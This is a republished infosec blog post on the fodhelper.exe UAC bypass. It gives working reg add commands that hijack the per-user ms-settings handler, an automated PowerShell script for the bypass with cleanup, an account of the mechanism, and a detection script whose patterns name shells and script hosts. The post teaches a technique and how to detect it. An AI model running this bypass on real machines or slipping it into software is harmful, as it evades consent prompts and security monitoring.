Under the Radar: Mastering the Art of Windows UAC Evasion!

alda69
Published in Infosec WatchTower
Jan 6, 2024

I bet you know this feeling. You want to run something as an administrator on your own PC, and boom: Windows UAC (User Account Control) puts a consent prompt in your face, even though it is your own machine. It is a small obstacle, but it draws attention, and it is a real problem when a script has to run something elevated unattended. Here is how to get past it.

How to bypass UAC

To make it clear: the purpose of this method is to suppress the consent prompt, NOT to gain privileges you do not already have. It only works when the current account is already a member of the local Administrators group, so that Windows has split your logon into a medium-integrity (filtered) token and a high-integrity (full admin) token; the trick moves you from the first to the second without the prompt. It also requires UAC to be at its default level. At "Always notify", auto-elevating binaries prompt like everything else and the technique fails.

Lets begin:

We'll work with the Windows registry and fodhelper.exe (the Features on Demand helper in System32). First we create a registry key whose default value holds the command we want to run elevated. I chose "cmd.exe" to try this out. We could add the key in the Registry Editor GUI, but that is easy to notice and slow. So let's use the CLI:

reg add "HKCU\Software\Classes\.abc\Shell\Open\command" /d "cmd.exe" /f

reg add: add a registry entry (surprise, surprise)
"HKCU\Software…": the path to the key; intermediate keys are created as needed
/d "cmd.exe": sets the data of the key's default value (no /v is given, so the default value is written), cmd.exe in this case
/f: force, so no confirmation is asked before the entry is written or overwritten

reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".abc" /f

Same idea here: this creates a per-user ms-settings class with a CurVer subkey whose default value points at the ".abc" class we just defined, so ms-settings now resolves to our command.

fodhelper.exe

Then we run fodhelper. Instead of the Settings app, our command is launched, and a new console window appears:

To check whether the new console really runs at high integrity, run this inside it:

whoami /groups | find "Label"

Mandatory Label\Medium Mandatory Level: nope, it didn't work (you are still in the filtered token)
Mandatory Label\High Mandatory Level: congrats, it worked

P.S.: To clean up after ourselves and make fodhelper behave normally again, remove both keys (the hijack stays active until you do, and every later fodhelper launch, including ones triggered by the Settings app, would run your command):

reg delete "HKEY_CURRENT_USER\Software\Classes\.abc\Shell\Open\command" /f
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /f
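The whole walk-through above as one script, added here as an example and not code from the original post: it checks the preconditions first (Administrators membership, UAC level, current integrity), performs the same two registry writes, has the elevated child record its own token groups to a file instead of relying on a screenshot, and removes the keys in a `finally` block so the hijack cannot outlive the test. The output file name and the 15-second wait are my own choices. It assumes a 64-bit, non-elevated PowerShell session on a test machine you own.

```powershell
# Added example (not the original post's code): fodhelper prompt bypass with
# preflight checks, an integrity check of the spawned child, and guaranteed cleanup.
# Assumptions: default UAC level, current user in Administrators, 64-bit PowerShell
# (from 32-bit PowerShell System32 is redirected and fodhelper.exe is not found).
# The registry writes below are well-known EDR signatures; use a lab VM.

$ErrorActionPreference = 'Stop'

$abcKey  = 'HKCU:\Software\Classes\.abc\Shell\Open\command'
$msKey   = 'HKCU:\Software\Classes\ms-settings'
$curVer  = Join-Path $msKey 'CurVer'
$outFile = Join-Path $env:TEMP 'fodhelper_check.txt'   # hypothetical name, written by the elevated child

# --- preflight: this is a prompt bypass, not a privilege escalation ---
$groups = (whoami /groups) -join "`n"
if ($groups -notmatch 'S-1-5-32-544') {
    throw 'Current user is not in Administrators; fodhelper will not auto-elevate for this account.'
}
if ($groups -match 'High Mandatory Level') { Write-Host 'Already running at high integrity; nothing to bypass.'; return }
$pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
if ($pol.EnableLUA -eq 0) { Write-Host 'UAC is disabled; nothing to bypass.'; return }
if ($pol.ConsentPromptBehaviorAdmin -eq 2) { throw 'UAC is at "Always notify"; auto-elevate is off and fodhelper would prompt.' }

$msKeyExisted = Test-Path $msKey
try {
    # Command the elevated process will run: dump its own token's groups to a file.
    $payload = "cmd.exe /c whoami /groups > `"$outFile`""
    Remove-Item $outFile -ErrorAction SilentlyContinue

    # Same two writes as the reg add commands above, via the registry provider.
    New-Item -Path $abcKey -Force | Out-Null
    Set-ItemProperty -Path $abcKey -Name '(default)' -Value $payload
    New-Item -Path $curVer -Force | Out-Null
    Set-ItemProperty -Path $curVer -Name '(default)' -Value '.abc'

    # HKCR is a merged view in which HKCU\Software\Classes wins over HKLM\Software\Classes,
    # so this per-user write is what ShellExecute inside the elevated process will see.
    $resolved = (Get-Item 'Registry::HKEY_CLASSES_ROOT\ms-settings\CurVer').GetValue('')
    Write-Host "HKCR\ms-settings\CurVer now resolves to: $resolved"

    Start-Process -FilePath "$env:windir\System32\fodhelper.exe"

    # Wait for the child to produce the file rather than guessing a sleep.
    $deadline = (Get-Date).AddSeconds(15)
    while (-not (Test-Path $outFile) -and (Get-Date) -lt $deadline) { Start-Sleep -Milliseconds 250 }
    if (-not (Test-Path $outFile)) { throw 'fodhelper ran but no output file appeared; check the registry writes.' }
    Start-Sleep -Milliseconds 500   # let cmd.exe finish flushing the redirect

    $childGroups = (Get-Content $outFile) -join "`n"
    if ($childGroups -match 'High Mandatory Level') { Write-Host 'Child ran at high integrity: bypass worked.' }
    else { Write-Host 'Child ran at medium integrity: bypass did not work.' }
}
finally {
    # Always remove the hijack so fodhelper (and the Settings app) behave normally again.
    Remove-Item -Path 'HKCU:\Software\Classes\.abc' -Recurse -Force -ErrorAction SilentlyContinue
    if ($msKeyExisted) { Remove-Item -Path $curVer -Recurse -Force -ErrorAction SilentlyContinue }
    else { Remove-Item -Path $msKey -Recurse -Force -ErrorAction SilentlyContinue }
    Remove-Item $outFile -ErrorAction SilentlyContinue
}
```

The `finally` block is the important part: the two reg delete commands in the post are easy to forget, and a leftover `ms-settings\CurVer` key means the next person (or the next Settings deep link) silently runs whatever you left in `.abc`.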

What can you use this for

First, if you are writing software that has to execute commands elevated, you may be tempted to use this so you neither have to tell users to run it as administrator nor bother them with the UAC prompt. Be aware of what that means, though: hijacking the ms-settings handler is exactly the behaviour endpoint security products look for (the fodhelper technique is a textbook UAC bypass), so shipping it in legitimate software makes it indistinguishable from malware. The supported way is an application manifest with requestedExecutionLevel set to requireAdministrator, or launching the elevated part with the "runas" verb, and accepting the prompt. Second, if you are doing ethical hacking or penetration testing with a Rubber Ducky, these commands replace the "left arrow, enter" keystroke sequence that accepts the UAC prompt. That sequence is hard to time correctly because the prompt appears with variable delay; with the registry commands, timing matters much less.

Most of the time, the workaround works like a charm. If the command you stored in the key does not behave as expected, fall back to storing plain "cmd.exe" as shown above, which spawns a high-integrity console, and then run your command inside that new console.

How does it work

Microsoft does not treat this as a security bug because, by its own definition, UAC is not a security boundary: the prompt exists to ask an administrator whether they meant to do something, not to protect the system from an administrator. fodhelper.exe is a Microsoft-signed binary in System32 whose manifest declares autoElevate, so when a member of the Administrators group starts it, Windows hands it a high-integrity token without showing a prompt. A process created by an elevated process inherits that token, so every process fodhelper spawns is elevated too. In simple terms: if an admin console spawns a new console, it has the same permissions.

The registry tells Windows which program handles a given file type or URL protocol, for example Firefox for .html files or the Settings app for ms-settings: links. Windows builds that mapping as a merged view (HKEY_CLASSES_ROOT) in which the per-user hive, HKCU\Software\Classes, takes precedence over the machine-wide HKLM\Software\Classes. Our first command defines a new ".abc" class whose Shell\Open\command is cmd.exe; our second command creates a per-user ms-settings class whose CurVer redirects to ".abc". When fodhelper, running elevated, asks the shell to open an ms-settings: URL, the lookup follows that redirect and lands on our command, which therefore starts with fodhelper's high-integrity token. The root cause is that a high-integrity process consults a hive (HKCU) that the medium-integrity user can write to, so the user decides what the elevated process executes.
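Because the bypass leaves a distinctive trail (a write under the user's Software\Classes\ms-settings key, followed seconds later by fodhelper.exe spawning a high-integrity child), it is straightforward to correlate. The following is an added example, not part of the original post: a small detection pass over constructed Sysmon-style records (Event ID 13 for a registry value set, Event ID 1 for process creation; the events, user names and SIDs are made up for the example, and the 60-second window and severity labels are my own choices).

```powershell
# Added example (not from the original post): correlate handler-hijack registry writes
# with fodhelper.exe child processes. Records below are constructed, not real logs;
# field names follow Sysmon Event ID 13 (RegistryEvent) and Event ID 1 (ProcessCreate).

$sampleEvents = @(
    @{ Id = 13; Time = [datetime]'2024-01-06T10:00:01'; User = 'LAB\alice'; Image = 'C:\Windows\System32\reg.exe'
       TargetObject = 'HKU\S-1-5-21-1-2-3-1001\Software\Classes\.abc\Shell\Open\command\(Default)' }
    @{ Id = 13; Time = [datetime]'2024-01-06T10:00:02'; User = 'LAB\alice'; Image = 'C:\Windows\System32\reg.exe'
       TargetObject = 'HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\CurVer\(Default)' }
    @{ Id = 1;  Time = [datetime]'2024-01-06T10:00:05'; User = 'LAB\alice'; Image = 'C:\Windows\System32\cmd.exe'
       ParentImage = 'C:\Windows\System32\fodhelper.exe'; IntegrityLevel = 'High'; CommandLine = 'cmd.exe' }
    # constructed control case: a fodhelper child with no preceding handler write for that user
    @{ Id = 1;  Time = [datetime]'2024-01-06T11:30:00'; User = 'LAB\bob'; Image = 'C:\Windows\System32\notepad.exe'
       ParentImage = 'C:\Windows\System32\fodhelper.exe'; IntegrityLevel = 'High'; CommandLine = 'notepad.exe' }
)

function Find-FodhelperBypass {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowSeconds = 60        # how long after the registry write a fodhelper child still counts
    )
    # Both known variants of the hijack: the CurVer redirect used in the post and the
    # direct ms-settings\Shell\Open\command write.
    $hijackPattern = '(?i)\\Software\\Classes\\ms-settings\\(CurVer|Shell\\Open\\command)'
    $hostPattern   = '(?i)\\(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)\.exe$'

    $regWrites   = @($Events | Where-Object { $_.Id -eq 13 -and $_.TargetObject -match $hijackPattern })
    $fodChildren = @($Events | Where-Object { $_.Id -eq 1  -and $_.ParentImage  -match '(?i)\\fodhelper\.exe$' })

    foreach ($child in $fodChildren) {
        $prior = @($regWrites | Where-Object {
            $_.User -eq $child.User -and
            $_.Time -le $child.Time -and
            ($child.Time - $_.Time).TotalSeconds -le $WindowSeconds
        })
        if ($prior.Count -gt 0) {
            [pscustomobject]@{
                Severity = 'high'; Time = $child.Time; User = $child.User; Child = $child.Image
                Reason   = "ms-settings handler written at $($prior[0].Time) by $($prior[0].Image), then fodhelper.exe spawned a $($child.IntegrityLevel)-integrity child"
            }
        }
        elseif ($child.Image -match $hostPattern) {
            # No logged write (e.g. the write happened outside the window or logging gaps):
            # a script host or shell under fodhelper.exe is still worth a look on its own.
            [pscustomobject]@{
                Severity = 'medium'; Time = $child.Time; User = $child.User; Child = $child.Image
                Reason   = 'fodhelper.exe spawned a shell or script host without a correlated handler write'
            }
        }
    }
}

# Expected on the sample: one high-severity hit for LAB\alice; LAB\bob's notepad.exe produces nothing.
Find-FodhelperBypass -Events $sampleEvents | Format-Table -AutoSize
```

In production the same two questions are asked of real telemetry: did a non-elevated process write under `HKU\<SID>\Software\Classes\ms-settings`, and did fodhelper.exe then become the parent of anything? The per-user key path is the important part, because the legitimate handler lives under HKLM and is never touched by the user's own account.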

Thanks for reading and let me know if want more of these posts.

Note from Publication: This story was uploaded with the permission of user "alda69" on 1/19/24. Please direct any feedback, comments, or citations to the original writer! Thank you — Infosec WatchTower

© [2024] Infosec WatchTower. All rights reserved. Unauthorized use or reproduction of content is prohibited. For inquiries, contact Infosec WatchTower.
